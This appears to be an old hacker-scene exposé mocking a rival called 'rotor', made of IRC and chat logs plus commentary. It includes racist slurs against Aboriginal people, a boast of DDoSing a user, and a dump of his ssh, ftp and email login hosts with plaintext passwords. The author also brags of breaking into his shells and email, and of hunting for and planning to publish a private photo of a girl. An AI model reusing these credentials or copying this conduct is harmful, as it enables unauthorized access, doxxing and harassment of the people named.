13:11 <@Torhne> ok 13:11 <@rotor`> come and find out 13:11 <@Torhne> im done 13:11 <@devii> rofl 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick 13:12 <@rotor`> you cannot comment on what you dont know 13:12 <@devii> Oh but i know ;/ 13:12 <@rotor`> HTF would you know how my parents genes worked 13:12 <@rotor`> HTF would you know how my parents genes worked 13:12 <@rotor`> HTF would you know how my parents genes worked 13:12 <@devii> That abo's cant afford computers. 13:12 <@devii> lol 13:12 <@rotor`> U WOULDNT 13:12 <@rotor`> devii : now your just being racist 13:12 <@devii> lol no im not 13:12 <@rotor`> idk how you rich fucks thinks 13:12 <@rotor`> But why am i on here 13:12 <@devii> AHAHAH 13:12 <@rotor`> on a 56k # Get a job then. 13:13 <@rotor`> and a pentium 1 13:13 <@rotor`> ? 13:13 <@devii> I WAS ON 56K FOR YEARS. 13:13 <@rotor`> DID U FUCKING THINK OF THAT 13:13 <@devii> Hahahahaaha 13:13 <@devii> aof'hsoidgfisdfg 13:13 <@devii> go drink some more goon then. 13:13 <@rotor`> shut ur rich racist fucking mouth up 13:13 <@devii> petrol sniffuh. 13:13 <@rotor`> So 13:13 <@devii> LOL 13:13 <@rotor`> who cares 13:13 <@devii> Haha 13:13 <@devii> Or steel another one of my thongs. 13:13 <@devii> GO ON DO IT. 13:13 <@rotor`> wow im not a rich stuck up daddys girl 13:13 <@devii> JUST ONE THOUGH. 13:14 <@rotor`> WOWO 13:14 <@devii> Aawh ;p 13:14 <@Torhne> HE WILL STEAL THAT SHIT WHEN YIOU ARE WEARING IT # Can this kid just shut the fuck up.. 13:14 <@devii> ROFL. 13:14 <@rotor`> MY DADDY DOSNT SUPPLY ME EVERYTHING # Probably because he is a drunk. 13:14 -!- mode/#Killerz [+b *!*@203.51.179.47] by rotor` 13:14 <@devii> COS THATS WHAT ABBO'S DO. 
13:14 -!- devii was kicked from #killerz by ping [Banned] 13:14 <@rotor`> no one bags on my heritage 13:35 <@rotor`> blizzy she isnt online anymore 13:36 < blizzy> why? 13:36 <@rotor`> i ddos'd her off 13:36 < blizzy> ok.. # From DDoS attacking NSA to DDoS attacking girls on IRC.... He is truly a great hacker. --------------------------------------------------------------------------------------------------------- Unfourtanetly I didnt manage to get the logs of when rotor joined #b4b0 and threatend to "own us all" :/ --------------------------------------------------------------------------------------------------------- [6] r0t0rs roots (that still works), ciscos (that still works) and passwords. roots that still works: # For a complete list just scroll up =) These are the cisco boxes he uses to DoS people with:
He really does have a great selection of passwords: ssh -l rotor matts.homeunix.net password: fuck3dup ssh -l h0rs3 69.17.188.187 # Dynamic IP password: QiivMOtLoiFZJC7 ssh -l hts ircd2.lomag.net password: 0mgbatm0n ftp panther.unixbsd.info (killerz.org) user: killerz password: fuck3dupsh1t ftp cserverz.com user: r0t0r password: fuck3dup www.cserverz.com/r0t0r/ # The stuff he has here is really funny.. user: rotor password: fuckf3ds rotorized9@hotmail.com # Also his MSN password: fuckfeds He also uses: fedsown Rotor has finally figured out he was owned and he has changed passwords on matts.homeunix.net and cserverz.com. Rest are the same I guess. I dont have the new IP to "69.17.188.187", but there wasnt anything interesting on it anyways. You can find the unreal.conf to his IRC server on his email. [7] Ok after getting all of his passwords, shells, email and all I think its time to find that god damn picture! (20:38:06) r0t0r: for some reason (20:38:10) r0t0r: i like a pakistani girl (20:38:48) Blizzy: heheh (20:38:49) Blizzy: cool (20:38:57) r0t0r: want a pic!? (20:39:05) Blizzy: yeah sure (20:39:14) r0t0r: http://kold.multiply.com/photos/album/1 (20:39:38) Blizzy: she is pretty (20:40:16) r0t0r: damn right (20:40:29) r0t0r: she sent me pics of her top half Up (20:40:33) r0t0r: I tihnk she likez me # Did she... hmm.. I wanna get my hands on that pic! (20:45:39) r0t0r: Who's pic did u find!?
(20:45:42) Blizzy: kc (20:45:43) Blizzy: fuck dude (20:45:45) Blizzy: she is HOT (20:45:50) r0t0r: erg (20:46:01) Blizzy: I want her to have my children (20:46:03) r0t0r: were did you find it? (20:46:11) Blizzy: your email.. I was hoping for a naked pic :( (20:46:15) Blizzy: But dude.. SHE IS HOT (20:46:16) Blizzy: SO HOT (20:46:24) Blizzy: fuck... (20:46:30) r0t0r: YOu didnt hand that pic out did you?> (20:46:34) Blizzy: Nope (20:46:43) Blizzy: I just drooled for.. 10 minutes then closed the window (20:48:33) r0t0r: Now she is pissed off i tihnk (20:49:55) Blizzy: tell her I wanna marry her :P (20:49:56) Blizzy: hehe (20:50:06) Blizzy: the pic never got public (21:05:49) r0t0r: LoL (21:05:53) r0t0r: she hates me now # Aint that sad... Ehm.... www.someurl.com/kc.jpg # need to find someone to host the pic. [8] Conclusion r0t0r check list: 1. Own killerz [CHECK] 2. Own matts.homeunix.net [CHECK] 3. Find more shells and own them [CHECK] 4. Expose rotor as a fake and a drunk [CHECK] 5. Expose r0t0rs lame roots [CHECK] 6. Find his cisco's which he uses to DoS people [CHECK] 7. Get his passwords and see if I can find a naked pic of that girl he is messing around with. [She wasnt naked, but it was still a nice pic] Well I guess thats it.. rotor is owned...